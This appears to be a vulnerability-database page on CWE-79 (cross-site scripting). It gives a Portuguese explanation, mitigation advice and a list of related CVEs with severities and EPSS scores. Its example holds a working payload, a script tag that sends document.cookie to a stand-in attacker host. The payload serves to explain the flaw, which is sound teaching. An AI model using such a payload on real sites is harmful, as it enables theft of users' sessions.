Fallos del tipo CWE-79

28.612 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2019-1685MEDIUMCisco Unity Connection Reflected Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2019-1671MEDIUMCisco Firepower Management Center Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2019-1661MEDIUMCisco TelePresence Management Suite Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2018-15435MEDIUMCisco SocialMiner Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2019-1643MEDIUMCisco Prime Infrastructure Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2019-1702MEDIUMCisco Enterprise Chat and Email Cross-Site Scripting VulnerabilitiesEPSS 1.2%CVE-2018-15467MEDIUMCisco TelePresence Management Suite Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2018-15461MEDIUMCisco Webex Business Suite Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2018-15463MEDIUMCisco Identity Services Engine Multiple Cross-Site Scripting VulnerabilitiesEPSS 1.2%CVE-2018-0401—Multiple vulnerabilities in the web-based management interface of Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenEPSS 1.2%CVE-2022-43497MEDIUMCross-site scripting vulnerability in WordPress versions prior to 6.0.3 allows a remote unauthenticated attacker to inject an arbitrary scriEPSS 1.2%CVE-2024-38108CRITICALAzure Stack Hub Spoofing VulnerabilityEPSS 1.2%CVE-2024-2997LOWBdtask Multi-Store Inventory Management System cross site scriptingEPSS 1.2%CVE-2022-24728MEDIUMCross-site Scripting in CKEditor4EPSS 1.2%CVE-2024-40482CRITICALAn Unrestricted file upload vulnerability was found in "/Membership/edit_member.php" of Kashipara Live Membership System v1.0, which allows EPSS 1.2%CVE-2024-41810MEDIUMHTML injection in HTTP redirect bodyEPSS 1.2%CVE-2022-1091—Safe SVG < 1.9.10 - SVG Sanitisation BypassEPSS 1.2%CVE-2021-43584MEDIUMDOM-based Cross Site Scripting (XSS vulnerability in 'Tail Event Logs' functionality in Nagios Nagios Cross-Platform Agent (NCPA) before 2.4EPSS 1.2%CVE-2023-31664MEDIUMA reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 API Manager before 4.2.0 allows attackers tEPSS 1.2%CVE-2018-15406—Cisco UCS Director Stored Cross-Site Scripting VulnerabilityEPSS 1.2%